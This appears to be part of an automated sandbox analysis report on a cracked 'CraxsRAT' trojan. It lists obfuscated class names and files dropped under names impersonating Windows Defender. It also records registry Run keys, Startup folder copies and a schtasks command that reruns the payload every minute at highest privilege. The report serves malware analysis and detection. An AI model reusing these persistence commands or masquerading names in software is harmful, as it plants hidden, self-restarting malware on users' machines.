Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, uUAcd1V7wC.cs High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs High entropy of concatenated method names: 'eFH2FmaJK5LUeKre09eLwsIjBu7PnAtmMTq8Vnl5d3s2bB3S7huedqJPoFEliTJ5IrWJMYaNpYjQFjSmozuWUD', '_4o2S3m4KVeiqQQ6kUSEXIthvHdYaVzhZcn0DalEllLssYTUFOASu1DewjUZ2H7FDLrZa7OF61yItSiYPbK9R8P', '_631JxyaTMNv4HZIY1so780lB5HTSRvLcD2fJIUcAWHLIGq37nySOMFa7vHFxgJQWL1N1ve21FUh7o8SNAHW7HI', 'bejFLzsMpoSCN2v5D7yaVeFVjIar9IKlSxJz1H6bk9TngTM1Mfpdgl4csHEYH1X9lKQPEB3sAFsnaFN8HlEcn2'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs High entropy of concatenated method names: 'HxXFfSw7hf', '_1C7vW2mY92', '_24zYi7EpgZ', 'TaY9sEdH4toPP7MHxMjvaAg7XJhnJALZEIE115cIf7lNg5UytZQmWAmgqnjw', 'zRCCAVNfHi2CMlqbExJ1GRdyBxzjBwJeQKTI31DatDX8Ggn524vi7i7Yrevi', '_47rQ23Ejjos3S4pRadMA5yPTHqTyjbliPO9EE4Gwv1pNpMoAhxD9Csq9E5J6', 'cRIhK73inV4njdFllvnlQOs92otehjuJNv3gRNA8kR0UXGMPLmIAyGq4wson', 'Bi2UDHgHU8vFDzifjKYM1dJmqTBJnZdWQlm1JzejRdZzzhEMhLZJbVUIQR9j', '_3qtr5oq2B1obDRNzs4DEnO6kHRKDPE8YLmKUAjwwwGMamVDL3I60yyvhO9vC', 'CpkKRHSkQb374EOiWHbmJs028FABbGY5IDHiVMBXV5NFMo8PO2TRTZHYGM0y'
Source: Windows Defender Notification.exe.10.dr, UzZMpgChwRaT8zNgaVCoesKDS3scFXjZncCD69l6zb8jbqdVau.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'rOpALqUFgE6thMm99MqbNIk1FdUdenflx1D0w3yqy4D8NYuO1PhXgxL6dfR91CfVxt0Z1ndDetkSPEGN9g3psK', 'xsZtL7CEKzM2jRdbT3mp0GEWML6Dp8gLJ6xconkV4OUVFwEMNiQB4kpJFPvDY8ATX84ZhlZCUKnVAJc1LVMfRC', '_1s1XrrBc1xpEdP7qKhITUNNiVguqMP5r1i1glKCvWj4NkI2mqqK192MGsFGXtjIvKehwKDwlspl0VOMsKoZRvZ', 'Wq5R5PjAfU1s4ZU7nYGRE5hdfDT03hysXA21YjM80U9NAt1Z7YEvhY9807Amhn5drh8lmpLzTYjah5AGS5Xjn9'
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs High entropy of concatenated method names: 'K3Dz63yLxdsjAtVozCvdXZr1rO788cMOQ1DvHOBY6q3fGhwhEBbZUjy6xfNf4aoHMLT2soHxXJWM9KjJwnX', 'Va2411o4GCAmLbiuT0KzKl9lyaZKRKvJTbnh1n5ICUSnN1y8OOrWQQ4KVHfwd1eCrtDXaVUn6akOxqme6Z9', 'cmKbkP9KFPm1vGlCs0HIMQp8AjRMozCK0hpsr6V3WjvsxdkNIk8iDiaI0gdkRsbdYkBgKQAkNYsOg9j8ovS', '_1nvgUtfpHaKsEVsrXBD5G2NV7axWKdpNi5tUQezreWWkcXauUbDKAFVEGjVI3Ed18Q0BBWbYYSqbVfeldKA', 'enLg1lTPCEGKAFakWf2ywahMfeffcWUNwhipT2iVuyHo5125c512455ZOrvBS1TVFemsfzbdaPBtW1D8ong', '_8vsfzdI2FJL44qzKITe5pDyOf2hcE54ZRxYEd1xofHNDDcSOAgpjCCvgHAUGePBlkP7oqwOzGbPIi4Vlwp9', 'DCHHDB6au7qzi8KhxLBBuzRSiiXfatXtKrmhOfM5lNpEw5PaDKtfm7PdCjSLQtqRuXgO2Bu2awKhqC03nfs', 'kutrzKb2sgrWZ8bkw80oBmlsqjf2P0botSprxItQlmhdweNofpr0P9ocBgH1arSSXY01xbQwDizJ7bKrXCh', 'PokwU0jcKWI57otPxsXapISPcRBm7JUSI3ZUIUjDHkvTtFOPxzkEd8t3muZUnW4Xcn8krUA0aRdVe3SkSI5', 'bzEVWbCL38A4IS1BidLSxM1pUQ5yMDJFSRZ2bYsRcwxkCs0kSxfnaecPsoD5KLFWFmf6K1DIyDSd0eejsv0'
Source: Windows Defender Notification.exe.10.dr, uHTIy6r9l8km7RHF3R1gfhVQFZLgQlJXzGfqtMdXzQRoxoN4usUdovyvRErvCLDIiShN.cs High entropy of concatenated method names: 'vV65D7AFcrfiS50zK4IBGgyjYJ5i7StSvWsvN52QcbUgramkIY8SEJ9RVOphtYaUK4a4', 'udT2QdaNbpH6yv6jw3gBHulqhB7AhFCNmjYchTp29WvcMqTddp9ygihKTKJzuzWdVekZ', 'W0SF6mJhhm', 'BLQYxx6xnM', 'TeJU2gNBVZ', 'pcV5RL4ho8', 'HMhRAqMOO9', 'AzNPgMSgYH', 'zdnlW7asch', 'roBeiESt2f'
Source: Windows Defender Notification.exe.10.dr, dRbRSlfClq9FzBPNcL355veDxzfFx2QIWnrggUkAAxxka4xjh2nGbpV0jwsb2c174JFuYrelADjFIWxDIRp.cs High entropy of concatenated method names: 'IRSmar0xXVR4UsJJOtVS3Nufgkl4S9oBQtSlQH2llsuNCYdPsN5Rk9ChpbTyFZGNq5uopS7ie3AiC5oY55l', 't9AfThoo7nMHFnR9tltANM4dKWhNxOFrL231jEj9z6Trma7K4h320tNpSHOe8Y70vyPC3pw0TbCNnAdljZW', 'CSllT1stUEH8bCYwTOBEwClyf7OOxkSgbTEtsLpHvmyVbY3ESy4rplbw3Z3W6paDw9t1CII3RKFCVzaJlFp', 'fxDsWtErS2WPg9n04qvh2tkGp5o9ZPC4LtwgUo8Nx5znyg5JwzergO4eNjY1QuMXk9gysfB8Me5aMrRbE1E', 'lxYGtK7oKCgdMuJmmsvdXi3aI7cKBLPXJDHVvdHji3xNJNO3ctjnlzlIO5mqtfA2SVgdhXHbUA8Zx5U4gy9', '_4mZ9QyfPaIZknqStmooj0ZSdf7sqTfpmY2TmJkgDzPSpIanAMc7kid8oT863AMhRyDiDWAonKFLPYmL5UZ8GMR', 'TOCbSj7ueBUbtKWNp97R2YAquZTw8vdKD92eb4ptZNTfXALR3pzZ1tVAdr07IOWudqqBtNrTVtTJYpjn2NvTFq', '_128ooaK8Ay1av0suWHrIubhLdQHfmfm2NQgKwnBT3JPSgSAMik3d1Ka1t9V7BJIRmuCRrg07F5x0nBgNmFMtH8', 'LEBTuCdV6B8HkfMEyGZut5l1TVxGjzdRGSvae4nNbbekcXYtgZBgy7kaTmHOBcMe4UD5y0QL2pY7tjCGdQV3vB', 'jKjZnQSJjkvPqSU17baZXt8aTfM2x0so13eMeCTUukFoo0vGrAszbeXi75jNPk2ckzKPRdK3VDYgoodu89tZgw'
Source: Windows Defender Notification.exe.10.dr, 8H0hdeBXNmvFjH8LejVEK2sRsxtRvHpaEUv4gz0XOQuxjnFHEDOH5YGig1PH9L3jiaNH.cs High entropy of concatenated method names: 'rGbeiPz0OChV2j5nw5PShma3VuRlCxGb5FUWgGSDAED34Cnduq5uxHtnfG7MtQgPTkVD', 'eqKQ6MVA5zxAyBxgYUz4wX3Pmlry', 'RAiYehoOKsoox4y4R6OC7Ldrw6UP', '_3s78StkDqmLED63R5qLD8vyz4Gil', 'wgHLuou176s3KG7W43NoDROZVCuN'
Source: Windows Defender Notification.exe.10.dr, uUAcd1V7wC.cs High entropy of concatenated method names: '_2S8IlRDS09', 'pjqDgiSIDQ', 'WfS6mBpWvh', 'EzwAFhJ8Xy', 'uYJ5UByWqFyVV21VK9xlXftX1LCG', 'bVQ9TJkJuS68ADrYqkdW8orrqzgw', 'jldwlwr4duUoiBr5eJ0penUR6YwT', 'V3PW2WaGywFVERzBd0R6lLTfyb8r', 'y9N3yYM2HxQHXXmdBQ2Q9hZcyM89', 'NjWV4Tw0G6mVriKH3MkCEE3tdjNQ'
Source: Windows Defender Notification.exe.10.dr, EOyKcrIIRLTNubYgGKGgKjoqSr7c9zgDf9aJO6MsxDbA40nsOqbxOGqvaZqHVnECdg6J.cs High entropy of concatenated method names: 'QMjwo3fILt4Q57oj4NTw0P4SrbNbIHsIDgwj5dJtmPpESYUsYvEwJ2dRK17AkQbHCEVR', 'PpWeAhKjSMaQHUtRxDJVvAkF9h5mZ0YxdJFxrvDnISXeQBYC0VSy3k10dnulrx4YrJL5', 'BkaWvTqOE5rv82tgze7NxQH2zcOGJB97UP2IniM0qLQxlB0re0SRdvhyGNX5RN2psBmV', 'qHL7QOmO7t3NVCCeg5I4k9GCJLiE', 'V6Q8jmcV0FYtDLRT14GgIJlknAOa', '_07HyQio1gYbc7kb4xMi0k442gudD', 'UufWd0OTWOQr9C6W228RwNFDRP3O', 'yyn46w0tdaVwZTGbWYKko0yTYvXo', 'qgZIiJUJDm1oQZVvQcJxCFCd0gFN', 'dQOYj5uew6SbhhatlWBijmPdHns0'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs High entropy of concatenated method names: '_872Ltu2fCH', 'jspSovylUO', 'adTPT0XeTE', 'TsZ6V52swD', 'pmpkki2lR0', 'CVKDY4oC8S', '_2yis8zC1eF', 'O6UriEAM1c', 'ondwqrYknc', 'ZPwkdtio2V'
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs High entropy of concatenated method names: 'hUTBZw0qQPPA85lrNna3ABameXhl8syhGD8CU9jKH2Kj2GcvLzxa8rERIkKay2xJ9Lhg', '_7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7', 'gcpIaJkjqYqCYihU09Ucj7eNVBxWPffEBpOCsIQeUY8IrvJfF8XAlA3yjt0Ej39iZGB2', '_96GnE5mKeCIDgVHH0TDChsZEdCmkXbMraCTU5AbAh1JlyB6dG4P8iNZtru6cdOuRY1Yj', 'IBe4xDCbPzxJjFNgC9J3xAlYFtWFjUXCJ35kg3zQ7ExGd2Z4HJN9goUWwjdhDPuU5KuM', '_91MeKo2qrjO69nzi9SiholxBL6H8iERcGUCL4K3x7FzIgvAuRjqtDl2fPMNq7vsHnTPY', 'mqyxUBTCVTLNILmtNSjzTi0o0uXveTYhYyuLzAlquZ1ey5mfDxkZuHAOuBiefWAhHXfp', 'E5pnqmBot5jiUR2C6qRun2DcQbIg0kP10RuVVPQ3Y0zzNxiAb8lTSczshlYrpf2nUyBO', 'qpWJmHdxvnEKdXyNbgBE2UsCFVnvttdlD9nNXE5BfhYjhhGG5o71sR5QMET9AvGk3de7', 's1zCMCUOduVNKa0bhH2aJtyqAjUjeNtROWW07XVgR9NsEK0DVs0KJSXX64qCygdAsmh9'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs High entropy of concatenated method names: 'C31WpCvMpd', 'ba8D85QmvDQVnyRzi3WLMmAfQ3z2', 'DPziFgzS4RcvDcs1UFyp7kEhA6sv', 'QQMAzcWbgNDxyrNwAeSIqlXSgaQG', 'ZkG9efTMmlw9Oo9Jqj6tvYJvGs2r'
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe File created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Notification.lnk
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
